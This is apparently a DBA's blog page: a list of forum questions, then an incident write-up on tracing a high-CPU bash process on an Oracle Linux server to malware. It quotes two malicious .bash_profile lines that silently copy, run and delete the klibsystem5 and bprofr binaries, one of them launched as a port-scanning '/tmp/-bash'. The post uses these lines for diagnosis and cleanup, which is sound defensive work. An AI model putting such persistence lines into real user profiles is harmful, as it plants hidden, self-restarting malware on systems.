Erman Arslan's Oracle Blog: May 2024

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

-- or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!

Supporting Oracle users around the world. Let's check what we have had in the last few weeks.

explain plan by Roshan

APPS user by big

General exception while launching forms by satish

Issue some users are facing by VinodN

Auto Generating -bash process by kvmishra

BSDataSource": IO Error: Socket read timed - R12.2.5 by satish

Oracle forms and reports without Oracle Weblogic by kvmishra

How to read/interpret Weblogic Server logs by VinodN

WARNING: The converted filename is an ASM fully qualified filename. by raiq1

Login issues R12.2.5 by satish

Login issue r12.2.5 by satish

Oracle Embedding Concept by kvmishra

oacore warrning by anmar

Disabling path in multipath by satish

R12.2 upgrade DB by big

fast forward database - test password expiry by Roshan

fast forward database - test password expiry by Roshan

E-business APEX HTTPS by big

Requests stuck in Pending Standby by VinodN

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey

This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. A systematic investigation traced the CPU usage to malicious scripts. The post also offers insights into troubleshooting bash process issues and highlights the importance of secure system configurations.

Note that this is based on a real story (an issue reported to me through my forum: Erman Arslan's Oracle Forum).

The Case:

The customer encountered a bash process consuming 98% CPU. Killing it brought only temporary relief, as it restarted automatically.

The Investigation Begins:

I requested more information to understand the process's behavior. The customer provided the top command output, which showed the bash process with high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flags to get detailed process information. This revealed that the bash process was in the sleeping state (S). Reading the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.
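As a rough sketch of the same check (not the exact commands used in this case), the state and command line can also be read directly from /proc. The function name proc_summary is made up for illustration, and the example assumes a Linux system with /proc mounted.

```shell
# Print the kernel-reported state and the command line of one process.
# Usage: proc_summary <pid>   (defaults to the current shell)
# proc_summary is a hypothetical helper name, not a standard tool.
proc_summary() (
    pid="${1:-$$}"
    dir="/proc/$pid"
    [ -d "$dir" ] || { echo "no such process: $pid" >&2; exit 1; }
    # The State line looks like "S (sleeping)" or "R (running)".
    grep '^State:' "$dir/status"
    # cmdline is NUL-separated; turn the separators into spaces for display.
    printf 'Cmdline: '
    tr '\0' ' ' < "$dir/cmdline"
    printf '\n'
)

# Example: inspect the current shell (replace "$$" with the PID under investigation).
proc_summary "$$"
```

Reading /proc this way needs no extra packages, which helps on a server where you would rather not trust or install anything new.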

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed the customer to examine the bash process's working directory (/proc/8879/cwd) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed that the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

Unknown process showing only as -bash: This process might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.
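The descriptor listing above can be reproduced with a small loop over /proc/<pid>/fd. This is only a sketch: fd_targets is a hypothetical helper name, and reading another user's descriptors generally requires root.

```shell
# List where each open file descriptor of a process points.
# Usage: fd_targets <pid>   (defaults to the current shell)
# fd_targets is a hypothetical helper name used for illustration.
fd_targets() (
    pid="${1:-$$}"
    for fd in "/proc/$pid/fd"/*; do
        # Every entry in /proc/<pid>/fd is a symlink; skip anything else
        # (for example the unexpanded pattern when the directory is unreadable).
        [ -L "$fd" ] || continue
        target=$(readlink "$fd") || continue
        printf '%s -> %s\n' "${fd##*/}" "$target"
    done
)

# Example: show only the descriptors that are not plain files,
# such as anon_inode:[eventpoll], anon_inode:[eventfd], or sockets.
fd_targets "$$" | grep -E 'anon_inode|socket' || echo "no anon_inode or socket descriptors"
```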

It is probably an OS process. The OS or a daemon probably starts it. It may belong to a monitoring process such as systemd-monitor.

*Use ps -ef or pstree -p to get a detailed listing of running processes. Look for processes whose parent process ID (PPID) matches the PID of the bash process.
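If ps or pstree are not available, or you do not trust the binaries on a possibly compromised host, the same parent/child lookup can be sketched from /proc alone. The helper name children_of is an assumption for illustration.

```shell
# Print "PID NAME" for every process whose parent is the given PID.
# Usage: children_of <pid>
# children_of is a hypothetical helper; it reads the Name, Pid and PPid
# fields from /proc/<pid>/status instead of calling ps.
children_of() (
    parent="$1"
    for status in /proc/[0-9]*/status; do
        # Processes can exit while we iterate, so read errors are ignored.
        awk -v p="$parent" '
            /^Name:/ { name = $2 }
            /^Pid:/  { pid = $2 }
            /^PPid:/ { ppid = $2 }
            END      { if (pid != "" && ppid == p) print pid, name }
        ' "$status" 2>/dev/null
    done
)

# Example: list the children of the current shell
# (replace "$$" with the PID of the suspicious process).
children_of "$$"
```

Running it the other way round (reading PPid from the suspicious process's own status file) tells you which process keeps respawning it.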

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, the buffer and maximum number of events to return, the timeout in milliseconds, and a signal mask.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout in milliseconds (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.
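To make this pattern easier to spot in a long trace, the strace output can be saved to a file and summarized. The sketch below is an assumption-laden illustration: summarize_epoll is a made-up helper, and the sample lines are not the customer's actual output. They are written in the usual strace format, reusing descriptor 4 and the timeout values 182 and 220 mentioned above.

```shell
# Summarize epoll_pwait calls found in strace output read from stdin:
# number of calls, how many returned 0 (timed out with no events),
# and the smallest and largest timeout requested (4th argument, in ms).
# summarize_epoll is a hypothetical helper name.
summarize_epoll() {
    awk '
        /epoll_pwait\(.*\].*\) += / {
            rest = $0
            sub(/^.*\]/, "", rest)       # drop everything up to the events array
            split(rest, a, /, */)        # a[2] = maxevents, a[3] = timeout
            timeout = a[3] + 0
            ret = $0
            sub(/^.*\) += +/, "", ret)   # keep only the return value
            calls++
            if (ret + 0 == 0) timeouts++
            if (calls == 1 || timeout < min) min = timeout
            if (calls == 1 || timeout > max) max = timeout
        }
        END {
            printf "calls=%d timed_out=%d min_timeout_ms=%d max_timeout_ms=%d\n", calls, timeouts, min, max
        }
    '
}

# Example with illustrative lines (normally: strace -p <pid> -o trace.log, then
# summarize_epoll < trace.log).
summarize_epoll <<'EOF'
epoll_pwait(4, [], 1024, 182, NULL, 8) = 0
clock_gettime(CLOCK_MONOTONIC, {tv_sec=1000, tv_nsec=0}) = 0
epoll_pwait(4, [], 1024, 220, NULL, 8) = 0
EOF
# prints: calls=2 timed_out=2 min_timeout_ms=182 max_timeout_ms=220
```

When nearly every call times out, as in the sample, the process is idling in its event loop rather than handling I/O.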

Further investigation suggested:

Check cron jobs and systemd services for any entries that might be starting the bash process.
Review system logs (/var/log/messages and dmesg) for any errors related to the process.
Investigate the script's purpose. If the script is legitimate, find out what it does and modify it to avoid excessive I/O calls and resource usage.
Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This is a complex approach and should only be attempted with a thorough understanding of the potential consequences.
Suggested commands for getting information on the context:

pstree
cat /proc/<pid>/cmdline
readlink /proc/<pid>/cwd
cd /proc/<pid>/fd; ls -al
ls -l /proc/<pid>/cwd
strace -p <pid>
lsof -p <pid>
crontab -l
systemctl list-unit-files
systemctl status <service_name>
cat .bash_profile (the customer discovered this one with the help of the suggestions)
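The cron and systemd checks can be narrowed down by searching the usual locations for a string you already suspect, such as a path seen in the process listing. This is a minimal sketch: find_persistence is a hypothetical helper, and the default directory list is an assumption based on a typical Oracle Linux layout, so adjust it for your system.

```shell
# Print the files under cron and systemd locations that mention a pattern.
# Usage: find_persistence <pattern> [path ...]
# Exits 0 when at least one file matches, 1 otherwise.
# find_persistence is a hypothetical helper; the default paths are assumptions.
find_persistence() (
    pattern="$1"
    shift
    [ "$#" -gt 0 ] || set -- /etc/crontab /etc/cron.d /etc/cron.hourly \
        /etc/cron.daily /var/spool/cron /etc/systemd/system /usr/lib/systemd/system
    found=1
    for path in "$@"; do
        [ -e "$path" ] || continue
        # -e protects patterns that start with a dash, such as "-bash".
        grep -rl -e "$pattern" "$path" 2>/dev/null && found=0
    done
    exit "$found"
)

# Example (run as root so that per-user crontabs are readable):
find_persistence '/tmp/' || echo "no cron or systemd entry mentions /tmp/"
```

An empty result does not clear the system. It only tells you that the restart mechanism lives somewhere else, for example in a shell startup file.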

The Culprit Revealed:

With the provided guidance, the customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see there is an entry made in .bash_profile automatically. Please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

*The system was affected by klibsystem5 and bprofr. These were malware.
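Since the entry was found in one user's .bash_profile, it is worth checking the startup files of the other OS users as well. The following is a sketch only: scan_startup_files is a made-up helper, the search strings are taken from the two entries quoted above, and a variant of the malware could use different names.

```shell
# Report startup-file lines that mention the names seen in this incident.
# Usage: scan_startup_files [home_dir ...]   (defaults to $HOME)
# Exits 0 when something is found, 1 otherwise.
# scan_startup_files is a hypothetical helper name.
scan_startup_files() (
    [ "$#" -gt 0 ] || set -- "$HOME"
    status=1
    for home in "$@"; do
        for f in .bash_profile .bashrc .bash_login .profile; do
            [ -f "$home/$f" ] || continue
            # -n prints the line number, -H always prints the file name.
            grep -nH -E 'klibsystem|bprofr|/tmp/-bash|/tmp/\.pwn' "$home/$f" && status=0
        done
    done
    exit "$status"
)

# Example: check the current user's startup files; as root, pass /home/* /root instead.
scan_startup_files || echo "no known indicators in the startup files checked"
```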

Suggestions for the fix:

Manual removal of the malware (klibsystem5 & bprofr): discover their source files and the affected system files, then delete them one by one (or, in the case of system files, clean out the malicious entries).

Automatic removal with a Linux virus scanner. (ClamAV is an example of such a tool, and it is easy to use.) -- https://oracle-base.com/articles/linux/linux-antivirus-clamav *Note that care must be taken not to delete any system files or EBS-related files.

Migrating the affected applications / databases to a new server. This might be the better option if we can't be sure that all of the malware has been removed. But if we migrate, there is a risk that we migrate the malware too, so careful and delicate work is required.
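For the manual and migration options, two small helpers can reduce the risk of mistakes. This is a sketch under stated assumptions, not a complete cleanup procedure: clean_profile and sweep_for_artifacts are hypothetical names, and the patterns only cover the file names and paths quoted earlier in this post.

```shell
# Both functions are illustrative; the patterns come from the entries quoted above.

# Write <file>.cleaned without the malicious lines; the original is not modified,
# so the result can be reviewed before it replaces the real file.
clean_profile() (
    src="$1"
    out="$src.cleaned"
    pattern='klibsystem|bprofr|/tmp/-bash'
    # Show the lines that will be dropped (with line numbers) for review.
    grep -n -E "$pattern" "$src"
    # grep -v exits 1 when no line survives the filter; only >1 is a real error.
    grep -v -E "$pattern" "$src" > "$out" || [ "$?" -eq 1 ] || exit 2
    echo "cleaned copy written to $out" >&2
)

# List files or directories named like the artifacts from this incident,
# for example in a staging area before it is copied to the new server.
sweep_for_artifacts() {
    find "$@" \( -name 'klibsystem*' -o -name 'bprofr' -o -name '-bash' -o -name '.pwn' \) -print 2>/dev/null
}

# Usage:
#   clean_profile /home/appsdev/.bash_profile    # the path is an example
#   sweep_for_artifacts /tmp /bin /home
```

A name-based sweep only catches known artifacts, so it complements a virus scan and does not replace one.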
